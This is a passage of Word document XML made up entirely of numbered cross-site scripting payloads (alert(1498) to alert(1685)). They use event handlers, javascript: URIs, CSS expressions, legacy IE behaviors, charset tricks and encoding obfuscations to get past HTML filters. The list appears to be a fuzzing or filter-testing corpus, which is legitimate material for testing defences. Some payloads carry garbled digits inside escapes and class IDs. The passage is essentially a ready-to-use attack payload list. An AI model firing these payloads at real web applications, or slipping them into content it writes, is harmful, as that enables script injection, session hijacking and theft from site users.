    <w:p w14:paraId="5A88F3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id="div1498"&gt;&lt;input value="``onmouseover=javascript:alert(1498)"&gt;&lt;/div&gt; &lt;div id="div2"&gt;&lt;/div&gt;&lt;script&gt;document.getElementById("div2").innerHTML = document.getElementById("div1498").innerHTML;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E524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 '="foo"&gt;&lt;x foo='&gt;&lt;img src=x onerror=javascript:alert(1499)//'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC327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src="javascript:alert(1500)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D883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src="javascript:alert(1501)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538EF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&lt;image src="javascript:alert(1502)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643F8E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src="javascript:alert(1503)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753ED8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style=width:1504px;filter:glow onfilterchange=javascript:alert(1504)&gt;x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F613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foo="&gt;&lt;script&gt;javascript:alert(1505)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296260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foo="&gt;&lt;script&gt;javascript:alert(1506)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E25EE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 foo="&gt;&lt;script&gt;javascript:alert(1507)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E308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foo="&gt;&lt;x foo='?&gt;&lt;script&gt;javascript:alert(1508)&lt;/script&gt;'&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170957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 foo="[[[Inception]]"&gt;&lt;x foo="]foo&gt;&lt;script&gt;javascript:alert(1509)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7497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 foo&gt;&lt;x foo="%&gt;&lt;script&gt;javascript:alert(1510)&lt;/script&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF74AC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id=d&gt;&lt;x xmlns="&gt;&lt;iframe onload=javascript:alert(1511)"&gt;&lt;/div&gt; &lt;script&gt;d.innerHTML=d.innerHTML&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFBAE6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\x00src=x onerror="alert(1512)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E42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\x47src=x onerror="javascript:alert(1513)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312101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\x15141514src=x onerror="javascript:alert(1514)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A537E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\x15152src=x onerror="javascript:alert(1515)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503042D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&lt;img\x47src=x onerror="javascript:alert(1516)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6680F3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&lt;img\x15170src=x onerror="javascript:alert(1517)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF7F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&lt;img\x15183src=x onerror="javascript:alert(1518)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C217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&lt;img\x32src=x onerror="javascript:alert(1519)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181E24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&lt;img\x47src=x onerror="javascript:alert(1520)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576AAD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&lt;img\x15211521src=x onerror="javascript:alert(1521)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289E6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\x47src=x onerror="javascript:alert(1522)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6870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\x34src=x onerror="javascript:alert(1523)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1C5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\x39src=x onerror="javascript:alert(1524)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F815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\x00src=x onerror="javascript:alert(1525)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E0E4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src\x09=x onerror="javascript:alert(1526)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBD41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src\x15270=x onerror="javascript:alert(1527)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739546B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src\x15283=x onerror="javascript:alert(1528)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C64B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src\x32=x onerror="javascript:alert(1529)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125693E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src\x15302=x onerror="javascript:alert(1530)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E73A5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src\x15311531=x onerror="javascript:alert(1531)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABC6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src\x00=x onerror="javascript:alert(1532)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E4EB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src\x47=x onerror="javascript:alert(1533)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3A86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src=x\x09onerror="javascript:alert(1534)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46442C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 src=x\x15350onerror="javascript:alert(1535)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076FA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src=x\x15361536onerror="javascript:alert(1536)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7124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src=x\x15372onerror="javascript:alert(1537)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227FD5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src=x\x15383onerror="javascript:alert(1538)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F12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&lt;img[a][b][c]src[d]=x[e]onerror=[f]"alert(1539)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F4FB9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onerror=\x09"javascript:alert(1540)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E658B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onerror=\x15410"javascript:alert(1541)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AF3D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onerror=\x15421542"javascript:alert(1542)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CA23C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onerror=\x15432"javascript:alert(1543)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CACFD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onerror=\x32"javascript:alert(1544)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D939F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 onerror=\x00"javascript:alert(1545)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335247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href=java&amp;#1546&amp;#2&amp;#3&amp;#4&amp;#5&amp;#6&amp;#7&amp;#8&amp;#15461546&amp;#15462script:javascript:alert(1546)&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768ECC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src="x` `&lt;script&gt;javascript:alert(1547)&lt;/script&gt;"` `&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CF4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onerror /" '"= alt=javascript:alert(1548)//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639E1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&lt;title onpropertychange=javascript:alert(1549)&gt;&lt;/title&gt;&lt;title title=&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158C86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href=http://foo.bar/#x=`y&gt;&lt;/a&gt;&lt;img alt="`&gt;&lt;img src=x:x onerror=javascript:alert(1550)&gt;&lt;/a&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1B38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&lt;!--[if]&gt;&lt;script&gt;javascript:alert(1551)&lt;/script --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4A56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&lt;!--[if&lt;img src=x onerror=javascript:alert(1552)//]&gt; --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E474F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id="x" classid="clsid:CB927D15532-4FF7-4a9e-A155369-56E4B8A75598"&gt;&lt;/object&gt; &lt;object classid="clsid:02BF25D5-8C15537-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1553)" style="behavior:url(#x);"&gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B68F2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style="-o-link:'javascript:javascript:alert(1554)';-o-link-source:current"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44332F8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&lt;style&gt;p[foo=bar{}*{-o-link:'javascript:javascript:alert(1555)'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB3A6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rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1556))%7d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D7FF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&lt;style&gt;@import "data:,*%7bx:expression(javascript:alert(1557))%7D";&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F296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style="pointer-events:none;position:absolute;"&gt;&lt;a style="position:absolute;" onclick="javascript:alert(1558);"&gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a href="javascript:javascript:alert(1558)"&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768369D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&lt;// style=x:expression\28javascript:alert(1559)\29&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8014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&lt;style&gt;*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1560))}&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9E6F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style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1561));"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1AF50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&lt;script&gt;({set/**/$($){_/**/setter=$,_=javascript:alert(1562)}}).$=eval&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7837AAF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&lt;script&gt;({0:#0=eval/#0#/#0#(javascript:alert(1563))})&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA5DA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&lt;script&gt;ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1564)}),x&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C809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&lt;script&gt;Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1565)')()&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701D4B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charset="mac-farsi"&gt;¼script¾javascript:alert(1566)¼/script¾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE61E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X&lt;x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1567)` &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B6C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1568&lt;set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&amp;#x41568vior:url(#default#time2)` attributename=`innerhtml` to=`&amp;lt;img/src=&amp;quot;x&amp;quot;onerror=javascript:alert(1568)&amp;gt;`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB24E1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1569&lt;animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&amp;lt;img/src=&amp;quot;.&amp;quot;onerror=javascript:alert(1569)&amp;gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026AD4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1570&lt;a href=#&gt;&lt;line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1570) strokecolor=white strokeweight=1570000px from=0 to=1570000 /&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576E92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style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1571)"&gt;XXX&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48007A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&lt;event-source src="%(event)s" onload="javascript:alert(1572)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556120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href="javascript:javascript:alert(1573)"&gt;&lt;event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1AA6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id="x"&gt;x&lt;/div&gt; &lt;xml:namespace prefix="t"&gt; &lt;import namespace="t" implementation="#default#time2"&gt; &lt;t:set attributeName="innerHTML" targetElement="x" to="&amp;lt;img&amp;#15741574;src=x:x&amp;#15741574;onerror&amp;#15741574;=javascript:alert(1574)&amp;gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7AD0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&lt;script&gt;javascript:alert(1575)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BD8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SRC="javascript:javascript:alert(1576);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF936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SRC=javascript:javascript:alert(1577)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9DE2F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SRC=`javascript:javascript:alert(1578)`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0718A4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SRC="javascript:javascript:alert(1579);"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A9D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ONLOAD=javascript:alert(1580)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301AFFC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ONLOAD=javascript:javascript:alert(1581)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D2B0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 ascript:javascript:alert(1582);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD2E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onload!#$%%&amp;()*~+-_.,:;?@[/|\]^`=javascript:alert(1583)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798487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SRC="javascript:javascript:alert(1584)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5F6A3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SRC="javascript:javascript:alert(1585);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237A6EA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DYNSRC="javascript:javascript:alert(1586)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF429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LOWSRC="javascript:javascript:alert(1587)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9FB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SRC="javascript:javascript:alert(1588);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726641C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SIZE="&amp;{javascript:alert(1589)}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F71C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HREF="javascript:javascript:alert(1590);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1BC1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&lt;STYLE&gt;li {list-style-image: url("javascript:javascript:alert(1591)");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DFE1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CONTENT="0;url=javascript:javascript:alert(1592);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD900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 URL=http://;URL=javascript:javascript:alert(1593);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE87A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SRC="javascript:javascript:alert(1594);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AE0E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BACKGROUND="javascript:javascript:alert(1595)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D43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BACKGROUND="javascript:javascript:alert(1596)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD554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url(javascript:javascript:alert(1597))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505E0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STYLE="width:expression(javascript:alert(1598));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8137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STYLE="xss:expr/*XSS*/ession(javascript:alert(1599))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413951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&lt;XSS STYLE="xss:expression(javascript:alert(1600))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF89F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TYPE="text/javascript"&gt;javascript:alert(1601);&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FB74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&lt;STYLE&gt;.XSS{background-image:url("javascript:javascript:alert(1602)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A74E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type="text/css"&gt;BODY{background:url("javascript:javascript:alert(1603)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7472FF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&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;javascript:alert(1604);&lt;/SCRIPT&gt;&lt;![endif]--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB6B45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HREF="javascript:javascript:alert(1605);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30ED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classid=clsid:ae24fdae-03c6-16061606d1606-8b76-0080c744f389&gt;&lt;param name=url value=javascript:javascript:alert(1606)&gt;&lt;/OBJECT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460F8D9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 xmlns:xss&gt;&lt;?import namespace="xss" implementation="%(htc)s"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;""","XML namespace."),("""&lt;XML ID="xss"&gt;&lt;I&gt;&lt;B&gt;&amp;lt;IMG SRC="javas&lt;!-- --&gt;cript:javascript:alert(1607)"&amp;gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"&gt;&lt;/SPAN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB87E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&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"&gt;&lt;?import namespace="t" implementation="#default#time2"&gt;&lt;t:set attributeName="innerHTML" to="XSS&amp;lt;SCRIPT DEFER&amp;gt;javascript:alert(1608)&amp;lt;/SCRIPT&amp;gt;"&gt;&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E086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 id="test" /&gt;&lt;button form="test" formaction="javascript:javascript:alert(1609)"&gt;X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A797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scroll=javascript:alert(1610)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input autofocus&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096983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&lt;P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1611)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE1ABA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&lt;STYLE&gt;a{background:url('s1612' 's2)}@import javascript:javascript:alert(1612);');}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F820A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charset= "x-imap4-modified-utf7"&amp;&amp;&gt;&amp;&amp;&lt;script&amp;&amp;&gt;javascript:alert(1613)&amp;&amp;;&amp;&amp;&lt;&amp;&amp;/script&amp;&amp;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD3970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onreadystatechange=javascript:javascript:alert(1614);&gt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6256B9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onreadystatechange=javascript:javascript:alert(1615);&gt;&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342471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&lt;?xml version="1616.0"?&gt;&lt;html:html xmlns:html='http://www.w3.org/1616999/xhtml'&gt;&lt;html:script&gt;javascript:alert(1616);&lt;/html:script&gt;&lt;/html:html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75205A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&lt;embed code=javascript:javascript:alert(1617);&gt;&lt;/embed&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753372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 onload=javascript:javascript:alert(1618)&gt;&lt;/frameset&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CB51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&lt;object onerror=javascript:javascript:alert(1619)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFA9A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&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC="javas]]&lt;![CDATA[cript:javascript:alert(1620);"&gt;]]&lt;/C&gt;&lt;X&gt;&lt;/xml&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C086A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SRC=&amp;{javascript:alert(1621);};&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F897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href="jav&amp;#65ascript:javascript:alert(1622)"&gt;test1622&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D8BC9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href="jav&amp;#97ascript:javascript:alert(1623)"&gt;test1623&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C835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srcdoc="&amp;LT;iframe&amp;sol;srcdoc=&amp;amp;lt;img&amp;sol;src=&amp;amp;apos;&amp;amp;apos;onerror=javascript:alert(1624)&amp;amp;gt;&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB12D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';alert(1625))//';alert(1625))//";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04297F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alert(1626))//";alert(1626))//--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470398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&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(1627))&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF8E0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SRC="javascript:alert(1628);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF61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SRC=javascript:alert(1629)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3F3C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SRC=JaVaScRiPt:alert(1630)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B2A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SRC=javascript:alert(1631)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3660ABB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SRC=`javascript:alert(1632)`&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A997B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onmouseover="alert(1633)"&gt;xxs link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D9BA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onmouseover=alert(1634)&gt;xxs link&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB8FF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"""&gt;&lt;SCRIPT&gt;alert(1635)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2253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SRC=javascript:alert(1636))&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E308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SRC=# onmouseover="alert(1637)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC8A6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 onmouseover="alert(1638)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A2C4D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onmouseover="alert(1639)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065D5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 ascript:alert(1640);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4285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SRC="jav&amp;#x09;ascript:alert(1641);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394B81A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SRC="jav&amp;#x0A;ascript:alert(1642);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BA59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SRC="jav&amp;#x0D;ascript:alert(1643);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B88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'print "&lt;IMG SRC=java\0script:alert(1644)&gt;";' &gt; out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D80EC3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 &amp;#14;  javascript:alert(1645);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F215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onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(1646)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FB97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&lt;&lt;SCRIPT&gt;alert(1647);//&lt;&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EA44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SRC="javascript:alert(1648)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E51AB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\";alert(1649);//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33DD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&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(1650);&lt;/SCRIPT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D470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SRC="javascript:alert(1651);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDBCF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BACKGROUND="javascript:alert(1652)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1A2F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DYNSRC="javascript:alert(1653)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C5250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LOWSRC="javascript:alert(1654)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2429AA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&lt;STYLE&gt;li {list-style-image: url("javascript:alert(1655)");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D857D5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ONLOAD=alert(1656)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35278D2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&lt;BGSOUND SRC="javascript:alert(1657);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495E59A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SIZE="&amp;{alert(1658)}"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1F84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HREF="javascript:alert(1659);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BF17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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(1660)';&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F799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STYLE="xss:expr/*XSS*/ession(alert(1661))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBFE17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exp/*&lt;A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert(1662))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539F7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TYPE="text/javascript"&gt;alert(1663);&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD36F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&lt;STYLE&gt;.XSS{background-image:url("javascript:alert(1664)");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2974A3C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type="text/css"&gt;BODY{background:url("javascript:alert(1665)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAD0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type="text/css"&gt;BODY{background:url("javascript:alert(1666)")}&lt;/STYLE&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BECBA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&lt;XSS STYLE="xss:expression(alert(1667))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B614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¼script¾alert(1668)¼/script¾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C54F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CONTENT="0;url=javascript:alert(1669);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6404A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&lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1670);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1390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SRC="javascript:alert(1671);"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8B0A1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SRC=# onmouseover="alert(1672)"&gt;&lt;/IFRAME&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600EB8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SRC="javascript:alert(1673);"&gt;&lt;/FRAMESET&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB6835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BACKGROUND="javascript:alert(1674)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D96D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&lt;TABLE&gt;&lt;TD BACKGROUND="javascript:alert(1675)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3E6F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url(javascript:alert(1676))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655AA3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url(&amp;#1;javascript:alert(1677))"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61483BE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expression(alert(1678));"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B303B7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HREF="javascript:alert(1679);//"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7465C61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echo('&lt;SCR)';echo('IPT&gt;alert(1680)&lt;/SCRIPT&gt;'); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6DC2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HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert(1681)&lt;/SCRIPT&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B9D75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 &lt;HEAD&gt;&lt;META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(1682);+ADw-/SCRIPT+AD4-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648813F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src=``&amp;NewLine; onerror=alert(1683)&amp;NewLine;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53734E1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/**/&gt;/**/alert(1684)/**/&lt;/script /**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0986996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&lt;iframe/src="data:text/html,&lt;svg &amp;#168516851685;&amp;#168516850;load=alert(1685)&gt;"&gt;</w:t>
      </w:r>
    </w:p>
